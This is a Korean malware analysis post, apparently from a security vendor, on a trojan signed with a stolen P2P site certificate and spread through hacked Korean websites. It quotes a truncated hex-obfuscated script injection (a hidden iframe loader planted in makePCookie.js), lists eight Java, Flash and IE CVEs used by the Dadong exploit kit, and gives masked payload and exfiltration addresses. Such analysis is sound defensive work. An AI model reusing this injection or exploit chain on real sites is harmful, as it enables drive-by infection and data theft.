악성코드가 탈취한 인증서를 사용하여 자신을 서명한 사례는 국내외에서 간헐적으로 발생해 왔고 언론을 통해 보도 된 바 있다. 이번에 발견된 악성코드는 국내 해킹된 웹 사이트를 통해 유포가 됐으며, PC를 감염시키는 과정에서 생성된 파일들 중에 하나가 특정 P2P 사이트의 인증서로 서명되어 있음을 발견하였다.
[그림 1] 국내 P2P 사이트의 인증서로 서명된 악성코드
위 [그림 1]이 최종으로 취약점(JAVA, IE, Flash Player)이 존재하는 PC로 다운로드 되어 실행되기까지의 과정을 정리해 보면 아래와 같다.
최초 악성 스크립트 링크가 삽입된 페이지 역시 P2P 웹 사이트였으며, makePCookie.js 파일에 Hex 문자열로 난독화된 형태의 악성 스크립트 링크가 존재 하였다.
http://on****.co.kr/js/makePCookie.js
|
• 난독화된 악성 스크립트 링크: window[“x64x6fx63x75x6dx65x6ex74”][“x77x72x69x74x65”](“x3cx69x66x72x61x6dx65 x77x69x64x74x68x3dx27x31x30x30x27x68x65x69x67x68x74x3dx27x30 x27x73x72x63x3dx27x68x74x74x70x3ax2fx2fx73x6ex73x6fx66x74x2ex64 x69//—중간생략—//x2ex68x74x6dx6cx27x3ex3cx2fx69x66x72x61x6dx65x3e”);
• 난독화 해제 후 코드:
|
난독화된 코드가 IE에 의해서 해석되면서 또 다른 특정 사이트로부터 악성 스크립트인 css.html을 다운로드 한 후 실행되도록 되어 있다. css.html은 국내 해킹된 웹 사이트에서 흔히 볼 수 있는 Exploit Toolkit인 Dadong 으로 난독화 되어 있으며, 기존의 형태와 마찬가지로 악성코드를 PC에 감염시키기 위해서 다중 취약점(JAVA, IE, Flash Player 등)을 사용했으며, 조건이 부합된 취약점을 통해서 실제 악성코드를 다운로드 및 실행하도록 해두었다.
아래 코드는 난독화된 css.html을 난독화 해제 한 후이며, 가능한 많은 PC를 감염시키기 위해서 자바 취약점 6개, Flash Player 1개, IE 1개 등 총 8개의 취약점을 사용했다.
|
Java |
Flash Player |
IE |
|
CVE-2011-3544 CVE-2012-0507 CVE-2012-1723 CVE-2012-4681 CVE-2012-5076 CVE-2012-5076 |
CVE-2013-0634 |
CVE-2012-1889 |
[표 1] css.html이 사용한 취약점 ID
만약 PC에 위 [표 1] 중에 하나의 취약점이 존재한다면 해당 취약점으로 인해서 특정 사이트로부터 파일을 다운로드 한 후 실행한다.
-. 파일 다운로드 URL: http://snsoft.*****bill.co.kr/about/up.exe
[그림 2] up.exe의 실행구조
up.exe에 의해서 생성된 “%SYSTEM%[서비스 이름]+32.dll”의 파일명은 감염된 PC에서 윈도우 정상 파일인 svchost.exe를 통해서 실행되는 서비스 명과 조합되며, 해당 파일을 이용하는 서비스 목록은 아래 레지스트리키 에서 확인이 가능하다.
[그림 3] svchost.exe를 통해서 실행되는 서비스 리스트
또한 up.exe는 감염된 PC의 맥 주소와 운영체제 버전정보 등을 암호화한 후 특정 IP로 전송하는 기능도 있다.
192.168.247.129 -> 116.***.121.*** UDP 360 Source port: simba-cs Destination port: 7125
[그림 4] 암호화 안된 시스템 정보
[그림 5] 암호화된 시스템 정보
Trojan/Win32.Agent
Categories:악성코드 정보